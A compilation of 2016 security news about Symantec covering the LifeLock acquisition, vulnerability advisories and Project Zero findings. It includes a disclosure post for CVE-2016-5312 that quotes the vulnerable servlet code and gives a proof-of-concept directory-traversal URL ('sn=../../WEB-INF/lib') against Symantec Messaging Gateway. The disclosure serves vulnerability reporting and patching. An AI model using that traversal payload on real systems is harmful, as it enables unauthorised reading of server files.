Symantec

Symantec made its first major acquisition of the Blue Coat Systems era with a $ 2.3 billion acquisition of identity protection firm LifeLock.

The Symantec-LifeLock deal is expected to close in the first quarter of 2017; the antivirus software maker paid $ 24 a share for LifeLock, which is approximately 16 percent higher than LifeLock's closing stock price of $ 20.75. Rumors of the acquisition emerged last week with Bloomberg News reporting that Symantec, along with investment firms Permira and TPG Capital, were interested in bidding on LifeLock.

The LifeLock purchase comes just a few months after a major shakeup at Symantec. The security software giant purchased web and cloud security firm Blue Coat Systems for $ 4.65 billion in June; Blue Coat CEO Greg Clark was named as Symantec's chief executive, filling the voice left by former CEO Michael Brown, who resigned from Symantec in April.

However, the acquisition of LifeLock is a departure from Symantec's recent efforts to chart a new course beyond its legacy antivirus and consumer-focused businesses and focus on new opportunities in cloud security. Following the Blue Coat acquisition, Symantec outlined its "cloud generation" vision, which was carried over from Blue Coat's own strategy to increase its cloud security offerings and combine them with existing web and networking technology.

But in Symantec's second quarter 2017 earnings call earlier this month, Clark stated that although the consumer security business had been in decline, he felt there was still room to grow.

"We believe the market opportunity for protecting consumers is larger than what our current consumer products address today," Clark said. "As we move to further penetrate these opportunities, we expect the Consumer Security business to improve its growth trajectory as we move beyond the PC."

In a conference call Monday, Clark said LifeLock's technology will compliment Symantec's Norton consumer products and expand the scope of consumer security offerings.

"Consumers pay between 2x and 3x more for identify protection than they pay for endpoint malware protection," he said. "With this acquisition Symantec accelerates its Consumer Business' return to growth by offering a digital safety platform to protect information, devices, networks and identities of consumers."

LifeLock, which was founded in 2005, has established itself as one of the leading companies in the consumer identity protection market, but the company ran afoul of the U.S. Federal Trade Commission over the years. In 2010, the company paid $ 12 million to settle claims that it used false claims to promote its identity theft protection services. Under the 2010 settlement, LifeLock agreed to refrain from making deceptive marketing claims and promised to "take more stringent measures to safeguard the personal information they collect from customers," according to the FTC.

However, in 2015 LifeLock was forced to pay an additional $ 100 million to settle FTC contempt charges after the agency found that LifeLock had violated aspects of the 2010 settlement. Specifically, the FTC said LifeLock "failed to establish and maintain a comprehensive information security program to protect users' sensitive personal information including their social security, credit card and bank account numbers." In addition, the FTC found that LifeLock continued to engage in false advertising claims and failed to abide by the 2010 settlement's recordkeeping requirements. 

Next Steps

Learn how behavioral assessments can benefit threat detection

Read more on the most important endpoint security features for enterprises

Discover how data obfuscation techniques can protect information

PRO+

Content

Find more PRO+ content and other member only offers, here.


SearchSecurity: Security Wire Daily News

Symantec has bought identity theft protection firm LifeLock for $ 2.3bn.

The deal, announced Sunday, represents a brave bid by Symantec to shore up a consumer security business eroded by dwindling anti-virus sales.

Selling Norton consumer security alongside identity protection and remediation services from LifeLock will enable sustainable "consumer segment revenue and profit growth", according to Symantec. The security giant said it plans to finance the transaction with cash supplemented by $ 750m of new debt. The deal – which is subject to LifeLock stockholder approval and US regulatory approval – is not expected to affect Symantec's FY17 results.

Symantec's share price dropped marginally on the announcement of a deal that effectively involves it "doubling down" on the consumer security market. Data breaches and the identity theft that sometimes results are a growing problem but whether the sometimes controversial LifeLock offers a comprehensive defence is far from convincing.

LifeLock's identity theft protection system is designed to alert subscribers about fraudulent applications for loans, credit cards or other financial services.

The $ 2.3bn price tag ($ 24 per share) offered from Symantec represents a 16 per cent premium on LifeLock's Friday closing share price of $ 20.75, itself a year-long high. LifeLock was also reportedly being pursued by private equity firms Permira, TPG, and Evergreen Coast Capital, as well as Symantec.

Symantec sold data storage software firm Veritas to Carlyle Group for $ 7.4bn earlier this year. Since then it has purchased Blue Coat for $ 4.65bn and now LifeLock for $ 2.3 billion in a bid to redefine itself as a pure play cybersecurity firm.

The purchase price looks high even though LifeLock is profitable. The company's net income for 3Q16 came out at $ 14.4m on sales of $ 170.3m.

Last year LifeLock was obliged to pay $ 100 million to settle charges (PDF) of failing to maintain a comprehensive information security program and deceptive advertising. The court order followed FTC enforcement action against LifeLock for alleged violations of an earlier 2010 order. ®

Sponsored: 10 Reasons LinuxONE is the best choice for Linux workloads


The Register - Security

Original release date: November 18, 2016

Symantec has released security updates to address a vulnerability in Norton and Symantec enterprise products. Exploitation of this vulnerability may allow an attacker to take control of an affected system.

Users and administrators are encouraged to review Symantec Security Advisory SYM16-021 and apply the necessary updates.

This product is provided subject to this Notification and this Privacy & Use policy.

Was this document helpful?  Yes  |  Somewhat  |  No


US-CERT Current Activity

In an already troubled year for Symantec, the company reported another major vulnerability in three of its enterprise security products.

Found in the IT Management Suite 8.0, Ghost Solution Suite 3.1 and Endpoint Virtualization 7.x products, the flaw is a dynamic link library (DLL) loading issue that can be exploited in two different ways. First, an "authorized, but nonprivileged" user could execute malicious DLL code in place of the authorized DLL code. The second way to exploit this DLL code flaw is for outside attackers to trick an authorized user to click on an email link that would download the malicious code. "Ultimately, this problem is caused by a failure to use an absolute path when loading DLLs during product boot up/reboot," Symantec said in its security advisory.

While DLL code vulnerabilities are common and thought to be a lesser threat to enterprises, Symantec rated this vulnerability as high severity. Symantec has not reported any actual exploitation of this vulnerability and has already released product upgrades that will fix the issue for all three products.

However, the discovery of this flaw, listed as CVE-2016-6590, is the latest in a growing line of Symantec security product vulnerabilities found this year. While the DLL flaw was unearthed by Himanshu Mehta, senior threat analysis engineer at Symantec, the three prior batches of flaws were reported by Google Project Zero's Tavis Ormandy.

The previous flaws include an easily exploitable one in the core scanning engine used in most Symantec and Norton antivirus products, as well as a vulnerability -- found just weeks after the first -- caused by unpatched, third-party open source software that was said to be "as bad as it gets" by Ormandy. The most recent set of Symantec bugs were in the file parser component of its antivirus decomposer engine.

In its vulnerability report for the DLL flaw, Symantec recommended several best practices for users of the affected products to reduce the threat, including restricting access to administrative or management systems to authorized privileged users, implementing the principle of least privilege and restricting remote access to only authorized systems.

In other news:

  • A gamer seeking revenge might be responsible for the Oct. 21 attack on domain name system  provider Dyn that shut down parts of the internet. In his testimony for a House Energy and Commerce Committee hearing, Level 3 Communications Inc. CSO Dale Drew said the attack was likely the work of a single individual who was specifically targeting the PlayStation Network. "We believe that in the case of Dyn, the relatively unsophisticated attacker sought to take offline a gaming site with which it had a personal grudge," Drew said. The attack used the Mirai malware to launch a distributed denial-of-service attack and gain control over more than 150,000 internet-of-things devices and overwhelm Dyn's sytems, which interrupted service to major websites, such as Twitter, Reddit and Netflix.
  • United States Director of National Intelligence James Clapper submitted his letter of resignation on Nov. 16. Clapper oversees 17 different agencies, including the CIA, FBI and National Security Agency, and he is the lead intelligence adviser to President Barack Obama. Clapper -- who is 75 years old and has held the position for six years -- announced his decision to resign in a Congressional hearing, and the Office of the DNI confirmed it on Twitter the following morning. Clapper was a central figure in the debate over government surveillance following the Edward Snowden revelations. He received criticism from lawmakers, security experts and privacy advocates for testifying before Congress in 2013 about the NSA's spying programs, claiming the agency did not engage in bulk data collection on millions of Americans. Clapper's resignation goes into effect at noon on Jan. 20, 2017.
  • Gavin Andresen, chief scientist at the Bitcoin Foundation, has regrets about getting involved in Craig Wright's attempts to prove he created the digital currency bitcoin. Andresen backed Wright's claim to be the mysterious Satoshi Nakamoto -- which he has failed to prove on multiple occasions -- and even defended Wright after his claims were debunked. Andresen has kept a relatively low profile since Wright's last failure six months ago, but posted a brief statement on his blog on Nov. 16. "So, either he was or he wasn't," Andresen wrote on whether or not Wright is Satoshi. "In either case, we should ignore him. I regret ever getting involved in the 'who was Satoshi' game, and am going to spend my time on more fun and productive pursuits."
  • The ransomware known as Crysis suffered a blow Nov. 13, when the master decryption keys were made available to the public after being posted on BleepingComputer forums. Crysis first surfaced in February 2016 when ESET researchers found it was filling in for the receding TeslaCrypt ransomware. According to ESET's report, Crysis is able to "encrypt files on fixed, removable and network drives. It uses strong encryption algorithms and a scheme that makes it difficult to crack in reasonable time." This ransomware was spread primarily through attachments to spam emails, but now its victims have an opportunity to recover what they've lost. The decryption keys -- posted by a BleepingComputer user known only as crss7777 -- cover Crysis versions 2 and 3, and Kaspersky Lab has already added them to the Rakhni decryptor.

Next Steps

Learn more about the critical Symantec vulnerabilities found this year

Find out how bad all these vulnerabilities are for Symantec

Discover more about the Mirai IoT botnet attacks

Dig Deeper on Enterprise Vulnerability Management

  • All
  • News
  • Get Started
  • Evaluate
  • Manage
  • Problem Solve

PRO+

Content

Find more PRO+ content and other member only offers, here.


SearchSecurity: Security Wire Daily News

# Title : Symantec Messaging Gateway <= 10.6.1 Directory Traversal
# Date : 28/09/2016
# Author : R-73eN
# Tested on : Symantec Messaging Gateway 10.6.1 (Latest)
# Software : https://www.symantec.com/products/threat-protection/messaging-gateway
# Vendor : Symantec
# CVE : CVE-2016-5312
# Vendor Advisory and Fix: https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160927_00
#
# ___ __ ____ _ _
# |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | |
# | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | |
# | || | | | _| (_) | |_| | __/ | | | / ___ \| |___
# |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|
#
#
# DESCRIPTION:
#
# A charting component in the Symantec Messaging Gateway control center does not properly sanitize user input submitted for charting requests.
# This could potentially result in an authorized but less privileged user gaining access to paths outside the authorized directory.
# This could potentially provide read access to some files/directories on the server for which the user is not authorized.
#
The problem relies in the package kavachart-kcServlet-5.3.2.jar , File : com/ve/kavachart/servlet/ChartStream.java
The vulnerable code is
extends HttpServlet {
public void doGet(HttpServletRequest httpServletRequest, HttpServletResponse httpServletResponse) {
block6 : {
try {
String string = httpServletRequest.getParameter("sn");
//**** Taking parameter "sn" and writing it to the "string variable"

if (string == null) break block6;
String string2 = string.substring(string.length() - 3);

byte[] arrby = (byte[])this.getServletContext().getAttribute(string);

//**** The string variable is passed here without any sanitanization for directory traversal
//**** and you can successfully use this to do a directory traversal.

if (arrby != null)
httpServletResponse.setContentType("image/" + string2);
ServletOutputStream servletOutputStream = httpServletResponse.getOutputStream();
httpServletResponse.setContentLength(arrby.length);
servletOutputStream.write(arrby);
this.getServletContext().removeAttribute(string);
break block6;

POC:
https://IP-address:PORT/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/lib


Exploit Files ≈ Packet Storm

The Google Project Zero bug reports just keep coming for Symantec.

Symantec patched two flaws in the file parser component of its antivirus decomposer engine, used by many Symantec products, after they were discovered in June by Google Project Zero information security engineer Tavis Ormandy. The bugs, which are the latest in a series of high-profile vulnerabilities affecting Symantec antivirus products, appear to parallel those Ormandy reported, and were patched by Symantec, earlier this year.

Although Symantec's report indicated the patched vulnerabilities were of medium severity, Ormandy disagreed, claiming Symantec had mischaracterized the flaws as enabling denial-of-service attacks; Ormandy insisted that they enable remote code execution attacks:

Via its LiveUpdate system, Symantec patched all Norton Security and Norton Antivirus products for Windows and Mac, but many of its enterprise products will need to be updated manually.

Ormandy wrote in the issue report: "We pointed out to Symantec that they hadn't updated their unrar-based unpacker for years, and it was vulnerable to dozens of publicly documented flaws." Anticipating that Symantec would fix that in all of its code bases, Ormandy went on, "but they appear to have just backported fixes for the few issues I sent them."

"Here are two known bugs in unrar that are fixed upstream, but not in Symantec's ancient code. If they continue to refuse to rebase, this might take a few iterations to shake the bugs out. Sigh."

This is the third batch of flaws in Symantec security products reported by Ormandy this year; the first, in May, included a vulnerability Ormandy described as being "as bad as it can possibly get." At the time, Ormandy wrote, that flaw, an RCE vulnerability, was particularly bad because Symantec used "a filter driver to intercept all system I/O, just emailing a file to a victim or sending them a link is enough to exploit it."

Next Steps

Listen to the Risk & Repeat podcast about Symantec's ongoing issues with vulnerabilities in its security products.

Find out more about lessons to be learned by antivirus vendors from research conducted by Tavis Ormandy on security flaws in Sophos' antivirus engine.

Read about the new Google Project Zero Prize competition to improve Android security.

PRO+

Content

Find more PRO+ content and other member only offers, here.


SearchSecurity: Security Wire Daily News

DEF CON Hardcore hackers and the corporate security industry have never really got on that well. Symantec is looking to change that after hiring Tarah Wheeler to act as its cybersecurity czar.

Wheeler has a long career in the IT industry, including stints at Microsoft and Blackphone-maker Silent Circle. Both of her parents worked in security for the US government, she has attended hacker conventions across the US, and gone as far as embedding an RFID chip in her left hand.

“Symantec wanted a nerd and they got a nerd,” she told The Register. “I’m joining to talk to the independent hacker community and find crazy and interesting research that isn’t showing up on the corporate radar.”

She said that the problems between the hacker community and the professional security industry are understandable. "In America, firms don’t hire hackers, they jail them,” she opined, and acknowledged there’s a lot of mistrust to overcome.

But Symantec is serious about rectifying this, she said, otherwise she wouldn't have taken the job. The software biz wants to engage with the community, use their talents, and has a “fire in its belly” about the issue. She has an uphill task, based on conversations we’ve had with hackers at DEF CON.

Meanwhile, Wheeler's just published a book titled Women in Tech as part of a campaign to get more diversity in the IT community. In 1984, 38 per cent of US computer science degrees were earned by women, she said, but that’s down to just 12 per cent now. While there are more women in the cybersecurity industry, the field is growing so rapidly that the diversity gap is growing yearly.

DEF CON’s a good place to address this; it’s much less of a sausage-fest than most IT conferences. With her new role, Wheeler is hoping to get hackers onside, and do something to address the gender issues in the industry. ®

Sponsored: 2016 Cyberthreat defense report


The Register - Security

All Symantec and Norton branded antivirus products

Symantec and Norton branded antivirus products contain multiple vulnerabilities. Some of these products are in widespread use throughout government and industry. Exploitation of these vulnerabilities could allow a remote attacker to take control of an affected system.

The vulnerabilities are listed below:

CVE-2016-2207

CVE-2016-2208

  • Symantec antivirus products use common unpackers to extract malware binaries when scanning a system. A heap overflow vulnerability in the ASPack unpacker could allow an unauthenticated remote attacker to gain root privileges on Linux or OSX platforms. The vulnerability can be triggered remotely using a malicious file (via email or link) with no user interaction. [2]

CVE-2016-2209 

  • Symantec: PowerPoint misaligned stream-cache remote stack buffer overflow [3]

CVE-2016-2210

  • Symantec: Remote Stack Buffer Overflow in dec2lha library [4]         

CVE-2016-2211

  • Symantec: Symantec Antivirus multiple remote memory corruption unpacking MSPACK Archives [5]

CVE-2016-3644

  • Symantec: Heap overflow modifying MIME messages [6]      

CVE-2016-3645

  • Symantec: Integer Overflow in TNEF decoder [7]       

CVE-2016 -3646

  • Symantec: missing bounds checks in dec2zip ALPkOldFormatDecompressor::UnShrink [8]

The large number of products affected (24 products), across multiple platforms (OSX, Windows, and Linux), and the severity of these vulnerabilities (remote code execution at root or SYSTEM privilege) make this a very serious event. A remote, unauthenticated attacker may be able to run arbitrary code at root or SYSTEM privileges by taking advantage of these vulnerabilities. Some of the vulnerabilities require no user interaction and are network-aware, which could result in a wormable-event.

Symantec has provided patches or hotfixes to these vulnerabilities in their SYM16-008 [9] and SYM16-010 [10] security advisories.

US-CERT encourages users and network administrators to patch Symantec or Norton antivirus products immediately. While there has been no evidence of exploitation, the ease of attack, widespread nature of the products, and severity of the exploit may make this vulnerability a popular target.


US-CERT Alerts